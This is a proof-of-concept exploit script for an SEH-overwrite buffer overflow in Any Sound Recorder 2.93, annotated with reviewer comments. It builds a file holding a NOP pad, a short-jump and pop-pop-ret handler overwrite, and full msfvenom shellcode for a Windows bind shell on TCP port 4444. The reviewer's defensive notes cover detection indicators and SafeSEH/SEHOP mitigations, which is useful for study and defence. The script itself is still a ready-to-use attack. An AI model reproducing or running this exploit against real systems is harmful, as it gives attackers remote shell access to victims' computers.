# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
# Exploit Author: Abdullah Alic
# Discovery Date: 2018-10-16
# Homepage: http://www.any-sound-recorder.com
# Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: 2.93
# Tested on: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "boom.txt". Copy the content of the "boom.txt".
# Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
# Connect victim machine on port 4444
#
# Reviewer summary: this proof of concept writes an oversized string to
# "boom.txt". Per the steps above, pasting it into the "User Name" field of
# the registration dialog overflows a buffer and overwrites a structured
# exception handler (SEH) record. No network or process interaction happens
# in this script itself; it only builds the string and writes the file.
#
# Defensive notes:
#   - The handler pointer below is a hard-coded address that the author
#     attributes to msacm32.drv, so the PoC depends on that module sitting at
#     the same address on the target. The listed test platform (XP SP3)
#     predates ASLR and SEHOP; SEH-overwrite techniques of this kind are what
#     SafeSEH and SEHOP were introduced to block.
#     NOTE(review): behaviour on later Windows versions is not shown here.
#   - The payload is a bind shell (see the msfvenom line); per the header it
#     listens on TCP 4444. A new listener on that port owned by the recorder
#     process, or a command shell spawned as its child, is the observable
#     indicator.
#   - The script uses Python 2 syntax (print statements).

# NOTE(review): this shebang is not on the first line of the file, so it is
# only a comment and has no effect when the script is executed directly.
#!/usr/bin/python

#Payload size: 355 bytes
#msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d" -f python
# Encoded payload bytes emitted by msfvenom (27 rows of 13 bytes + 4 = 355).
buf = ""
buf += "\xb8\x67\x21\x25\x53\xdd\xc0\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x8c\xdd\xc7"
buf += "\xa6\xae\xf6\x8a\x49\x4e\x07\xeb\xc0\xab\x36\x2b\xb6"
buf += "\xb8\x69\x9b\xbc\xec\x85\x50\x90\x04\x1d\x14\x3d\x2b"
buf += "\x96\x93\x1b\x02\x27\x8f\x58\x05\xab\xd2\x8c\xe5\x92"
buf += "\x1c\xc1\xe4\xd3\x41\x28\xb4\x8c\x0e\x9f\x28\xb8\x5b"
buf += "\x1c\xc3\xf2\x4a\x24\x30\x42\x6c\x05\xe7\xd8\x37\x85"
buf += "\x06\x0c\x4c\x8c\x10\x51\x69\x46\xab\xa1\x05\x59\x7d"
buf += "\xf8\xe6\xf6\x40\x34\x15\x06\x85\xf3\xc6\x7d\xff\x07"
buf += "\x7a\x86\xc4\x7a\xa0\x03\xde\xdd\x23\xb3\x3a\xdf\xe0"
buf += "\x22\xc9\xd3\x4d\x20\x95\xf7\x50\xe5\xae\x0c\xd8\x08"
buf += "\x60\x85\x9a\x2e\xa4\xcd\x79\x4e\xfd\xab\x2c\x6f\x1d"
buf += "\x14\x90\xd5\x56\xb9\xc5\x67\x35\xd6\x2a\x4a\xc5\x26"
buf += "\x25\xdd\xb6\x14\xea\x75\x50\x15\x63\x50\xa7\x5a\x5e"
buf += "\x24\x37\xa5\x61\x55\x1e\x62\x35\x05\x08\x43\x36\xce"
buf += "\xc8\x6c\xe3\x7b\xc0\xcb\x5c\x9e\x2d\xab\x0c\x1e\x9d"
buf += "\x44\x47\x91\xc2\x75\x68\x7b\x6b\x1d\x95\x84\x82\x82"
buf += "\x10\x62\xce\x2a\x75\x3c\x66\x89\xa2\xf5\x11\xf2\x80"
buf += "\xad\xb5\xbb\xc2\x6a\xba\x3b\xc1\xdc\x2c\xb0\x06\xd9"
buf += "\x4d\xc7\x02\x49\x1a\x50\xd8\x18\x69\xc0\xdd\x30\x19"
buf += "\x61\x4f\xdf\xd9\xec\x6c\x48\x8e\xb9\x43\x81\x5a\x54"
buf += "\xfd\x3b\x78\xa5\x9b\x04\x38\x72\x58\x8a\xc1\xf7\xe4"
buf += "\xa8\xd1\xc1\xe5\xf4\x85\x9d\xb3\xa2\x73\x58\x6a\x05"
buf += "\x2d\x32\xc1\xcf\xb9\xc3\x29\xd0\xbf\xcb\x67\xa6\x5f"
buf += "\x7d\xde\xff\x60\xb2\xb6\xf7\x19\xae\x26\xf7\xf0\x6a"
buf += "\x56\xb2\x58\xda\xff\x1b\x09\x5e\x62\x9c\xe4\x9d\x9b"
buf += "\x1f\x0c\x5e\x58\x3f\x65\x5b\x24\x87\x96\x11\x35\x62"
buf += "\x98\x86\x36\xa7"

# Sizing constant for the trailing pad; the pad is junk - len(buf) bytes long.
junk = 10000
# Four bytes placed where the "next SEH" field sits: EB 06 is an x86 short
# jump of 6 bytes, which skips the two 0x90 bytes and the 4-byte handler
# pointer that follow it, landing on the start of buf.
nseh= "\xeb\x06\x90\x90" # SHORT JMP 6 bytes
# Four bytes that overwrite the handler pointer, stored little-endian.
seh= "\x35\x2f\xd1\x72" # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c FROM msacm32.drv
# Final layout: 900 bytes of 0x90, nseh, seh, payload, then the trailing pad
# of 0x90 bytes (10000 - 355 = 9645), 10908 bytes in total.
# NOTE(review): 900 is presumably the offset to the SEH record in the tested
# build; nothing on this page derives it.
buffer = "\x90" * 900 + nseh + seh + buf + "\x90" * (junk-len(buf))

payload = buffer
#badchars \x00 \x0a \x0d
# Write the string to boom.txt and report the outcome.
# NOTE(review): the bare except reports every failure, including errors that
# have nothing to do with file creation, as "File cannot be created", and the
# handle is never closed if write() raises.
try:
    f=open("boom.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"